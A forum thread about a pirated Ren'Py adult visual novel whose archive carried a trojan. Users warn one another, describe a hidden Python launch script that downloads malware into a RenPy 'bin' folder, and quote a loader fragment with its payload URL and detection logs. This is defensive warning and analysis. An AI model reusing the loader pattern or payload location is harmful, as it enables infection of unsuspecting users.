discussion Complete VN Ren'Py [HS2] Depth's Revival [Final Stories] [Seacth]

[Retaining4944]

Remember to scan this archive reports from some 95 site said it tried to connect to net and is blocked by bitdefender

 

[DragonsFear]

watch out, it is infected with a trojan @Dean

 

[DragonsFear]

Remember to scan this archive reports from some 95 site said it tried to connect to net and is blocked by bitdefender

this is the same one

 

[Death Angel Studio's iconDeath Angel Studio]

watch out, it is infected with a trojan @Dean

View attachment 157932

which version did you download In other words DM the DLL file to me so i can check it

 

[DragonsFear]

which version did you download In other words DM the DLL file to me so i can check it

looks like it got solved already
but it was both the gofile and the pixeldrain ( didn't check the others when it happend)

but looking at Fuck95, it happend on all links what i could tell

 

[DragonsFear]

@Dean thanks for the quick fix of cleaning it up

 

[Death Angel Studio's iconDeath Angel Studio]

@Dean thanks for the quick fix of cleaning it up

Dean is something we mods use when we dont want the ownership of the thread. He is not a living thing. Guz did most of it

 

[vardeba]

it's a big download. I hope it's worth it.

 

[DragonsFear]

Dean is something we mods use when we dont want the ownership of the thread. He is not a living thing. Guz did most of it

oke , so thanks for the heads up

@Guz89 im going to kick your ass bec now i had to scan all my god d.... files

 

[DragonsFear]

it's a big download. I hope it's worth it.

yes its worth it for what i read , alot is changed so it makes more sence now

 

[User_61141]

oke , so thanks for the heads up

@Guz89 im going to kick your ass bec now i had to scan all my god d.... files

blame @Dean
I'm just learning how to clean the files and in this case, they were all clean, maybe I need a strong cleaner (I'm using VirusTotal online and local Malwarebytes)

 

[DragonsFear]

blame @Dean
I'm just learning how to clean the files and in this case, they were all clean, maybe I need a strong cleaner (I'm using VirusTotal online and local Malwarebytes)

problem is that its integrated in the files

so unless you launch it you woudn't know its in there

so as a joke i say i blame you , but im just glad my scanner detected it at launch and i mentioned it here ,
before others got problems with it , and the damage would be way worse

and the bitch with this script is, no you can't see it when you scan it without launching the game first

 

[DragonsFear]

blame @Dean
I'm just learning how to clean the files and in this case, they were all clean, maybe I need a strong cleaner (I'm using VirusTotal online and local Malwarebytes)

btw i used windows defender and ESET (both gave a red light on it )

and if you wanted to test it , i would recommend looking in how to run with VM's
that way it will always be contained no matter which virus /trojan etc you get

 

[User_61141]

btw i used windows defender and ESET (both gave a red light on it )

and if you wanted to test it , i would recommend looking in how to run with VM's
that way it will always be contained no matter which virus /trojan etc you get

I'll, thank you very much for that info

 

[Jubjub]

problem is that its integrated in the files

so unless you launch it you woudn't know its in there

so as a joke i say i blame you , but im just glad my scanner detected it at launch and i mentioned it here ,
before others got problems with it , and the damage would be way worse

and the bitch with this script is, no you can't see it when you scan it without launching the game first

Is there any clue on how it ended up being infected?

 

[hrmm]

Is there any clue on how it ended up being infected?

Both this and the other game (Raven, newest update Segment 5 which hadn't been updated here yet) were linked to by active, high post count, old accounts over on F.95. So what seems to be happening is the bad actor in question is getting leaks of the updates (either elsewhere or by subscribing), putting their code into the game, and then posting the links of the infected version using hacked F.95 accounts.

How it works is that there's a python script (the language RenPy is built on) that executes when you launch the game. It looks like any other of the various python files that RenPy uses, so virus/malware scanners aren't going to catch it. When you launch the game, the bad code executes and downloads the actual malware, which scanners will catch. These recent ones and most of the first batch made a "bin" folder in the RenPy save folder (%appdata%\Roaming\RenPy) which is where the malware gets downloaded to. So if you have that "bin" folder in there, scan your system (and probably scan anyway just to be safe, if you haven't).

 

[menalaos]

So aside from the malware, how was this update?

 

[Freyr059]

Lactation is quite interesting, do you know others games with that stuff?

 

[randomusernameXXX]

Yup it had packed script i didnt quite catch the file what it was supposed to do
It copied it self to my documents (because i symlinked folder) and from there attempted to download ,compile and execute au3 script.
My Documents\RenPy\bin\DepthsRevivals.exe\Leslie\CompiledAutoitUnpack\script.au3;script.au3 My Documents\RenPy\bin\DepthsRevivals.exe

def run(): # Define the URL of the file you want to download (updated to the new ZIP file URL) download_url = "https://github.com/raspberrypi/linux/files/15439198/screens.txt"

Detected at: 5/28/2024 6:51:05 PM Web address: https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/..... Reason: object is infected [URL='http://redirect.kaspersky.com/?hl=en&target=securelist&rpe=1&function=search&VN=HEUR:Trojan.Win32.Autoit.gen']HEUR:Trojan.Win32.Autoit.gen[/URL]

Leslie is not my name, probably who ever done that.

 

[Dobermann]

Ah yeah. Great breeding, preggo, lactation content! So many round bellies. Must be a dog thing.

Also... the idea of banging your own imaginary friend into reality, very evocative.